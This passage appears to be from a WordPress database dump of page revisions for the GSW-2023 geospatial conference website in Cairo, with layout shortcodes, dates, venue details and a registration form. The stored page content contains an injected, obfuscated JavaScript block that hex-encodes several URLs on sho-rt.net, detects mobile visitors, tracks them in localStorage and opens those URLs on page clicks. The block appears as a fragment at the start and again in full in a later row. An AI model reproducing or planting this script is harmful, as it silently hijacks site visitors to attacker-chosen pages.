Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 22:27:19','2022-11-11 22:27:19','',3066,'https://gsw2023.com/?p=3316',0,'revision','',0),
(3317,1,'2022-11-11 22:28:49','2022-11-11 22:28:49','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-11 22:28:49','2022-11-11 22:28:49','',3066,'https://gsw2023.com/?p=3317',0,'revision','',0),
(3318,1,'2022-11-12 13:50:36','2022-11-12 13:50:36','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Which access pass would you like to purchase?\",\"choices\":{\"1\":{\"label\":\"Bronze - $199.95\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Silver - $299.95\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Gold - $399.95\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"checkbox\",\"label\":\"Which sessions do you plan on attending?\",\"choices\":{\"1\":{\"label\":\"Session 1\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Session 2\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Session 3\",\"value\":\"\",\"image\":\"\"},\"4\":{\"label\":\"Session 4\",\"value\":\"\",\"image\":\"\"},\"5\":{\"label\":\"Session 5\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"radio\",\"label\":\"Will you be staying overnight?\",\"choices\":{\"1\":{\"label\":\"Yes\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"No\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\",\"choices\":{\"1\":{\"label\":\"I would like to receive email updates regarding future 